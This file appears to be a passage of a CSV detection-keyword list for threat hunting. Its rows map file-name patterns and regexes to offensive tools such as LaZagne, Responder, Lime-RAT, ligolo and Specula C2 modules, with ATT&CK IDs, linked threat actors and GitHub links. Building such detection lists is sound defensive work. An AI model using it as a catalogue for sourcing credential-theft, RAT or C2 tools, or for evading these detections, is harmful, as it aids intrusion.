- TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","N/A","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","16213" "*\lazagne.exe*",".{0,1000}\\lazagne\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16214" "*\lazagne.exe*",".{0,1000}\\lazagne\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16215" "*\LaZagne.py*",".{0,1000}\\LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16216" "*\lazagne.zip*",".{0,1000}\\lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16217" "*\ldap_search_bof.py*",".{0,1000}\\ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","16218" "*\ldap_shell.cmd*",".{0,1000}\\ldap_shell\.cmd.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original 
PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","16219" "*\ldap-checker.py*",".{0,1000}\\ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16220" "*\LDAP-Clear-Text-Password-*.txt*",".{0,1000}\\LDAP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16221" "*\LDAP-NTLMv1-Client-*.txt*",".{0,1000}\\LDAP\-NTLMv1\-Client\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","16222" "*\ldapper.py*",".{0,1000}\\ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","16223" "*\LDAPPER-master*",".{0,1000}\\LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","16224" "*\ldapph.db*",".{0,1000}\\ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","16225" "*\ldap-search.py*",".{0,1000}\\ldap\-search\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16226" "*\ldapsearch-ad.py*",".{0,1000}\\ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16227" "*\LdrLockLiberator.c*",".{0,1000}\\LdrLockLiberator\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","16228" "*\LdrLockLiberatorWDK.c*",".{0,1000}\\LdrLockLiberatorWDK\.c.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","0","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","16229" "*\letmein.ps1*",".{0,1000}\\letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","16230" "*\lfs_injection.exe*",".{0,1000}\\lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","16235" 
"*\liblsarelay.dll*",".{0,1000}\\liblsarelay\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16236" "*\liblsarelayx.dll*",".{0,1000}\\liblsarelayx\.dll.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","16237" "*\LibSnaffle*",".{0,1000}\\LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","16239" "*\ligolo_agent.exe*",".{0,1000}\\ligolo_agent\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","16241" "*\ligolo-proxy*",".{0,1000}\\ligolo\-proxy.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - 
TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","16242" "*\lilith.txt*",".{0,1000}\\lilith\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16243" "*\Lime-Crypter.sln*",".{0,1000}\\Lime\-Crypter\.sln.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","16244" "*\Lime-Crypter\*",".{0,1000}\\Lime\-Crypter\\.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","16245" "*\Lime-RAT-*.zip*",".{0,1000}\\Lime\-RAT\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16246" 
"*\LimeRAT.exe*",".{0,1000}\\LimeRAT\.exe.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16247" "*\LimeRAT.sln*",".{0,1000}\\LimeRAT\.sln.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16248" "*\LimeRAT.v*.zip*",".{0,1000}\\LimeRAT\.v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - 
TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16249" "*\LimeRAT-MUSIC.MP3*",".{0,1000}\\LimeRAT\-MUSIC\.MP3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","16250" "*\LimitlessNet RAT.exe*",".{0,1000}\\LimitlessNet\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16251" "*\LinikatzV2\*",".{0,1000}\\LinikatzV2\\.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","0","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","16252" 
"*\list_addcomputertodomain.py*",".{0,1000}\\list_addcomputertodomain\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16254" "*\list_amsiproviders.py*",".{0,1000}\\list_amsiproviders\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16255" "*\list_amsiproviders.txt*",".{0,1000}\\list_amsiproviders\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16256" "*\list_applocker.py*",".{0,1000}\\list_applocker\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16257" "*\list_applocker.txt*",".{0,1000}\\list_applocker\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16258" "*\list_asreproast.py*",".{0,1000}\\list_asreproast\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16259" "*\list_asreproast.txt*",".{0,1000}\\list_asreproast\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16260" "*\list_autoruns.py*",".{0,1000}\\list_autoruns\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - 
TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16261" "*\list_autoruns.txt*",".{0,1000}\\list_autoruns\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16262" "*\list_clipboard.py*",".{0,1000}\\list_clipboard\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16263" "*\list_clipboard.txt*",".{0,1000}\\list_clipboard\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16264" "*\list_domaininfo.py*",".{0,1000}\\list_domaininfo\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - 
TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16265" "*\list_lapspassword.py*",".{0,1000}\\list_lapspassword\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16266" "*\list_lapspassword.txt*",".{0,1000}\\list_lapspassword\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16267" "*\list_localadmins.py*",".{0,1000}\\list_localadmins\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16268" "*\list_localadmins.txt*",".{0,1000}\\list_localadmins\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 
- T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16269" "*\list_localusers.py*",".{0,1000}\\list_localusers\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16270" "*\list_localusers.txt*",".{0,1000}\\list_localusers\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16271" "*\list_passwordnotrequired.py*",".{0,1000}\\list_passwordnotrequired\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16272" "*\list_passwordnotrequired.txt*",".{0,1000}\\list_passwordnotrequired\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the 
context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16273" "*\list_passwordpolicy.py*",".{0,1000}\\list_passwordpolicy\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16274" "*\list_passwordpolicy.txt*",".{0,1000}\\list_passwordpolicy\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16275" "*\list_recentcommands.py*",".{0,1000}\\list_recentcommands\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16276" "*\list_recentcommands.txt*",".{0,1000}\\list_recentcommands\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for 
interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16277" "*\list_recyclebin.py*",".{0,1000}\\list_recyclebin\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","16278" 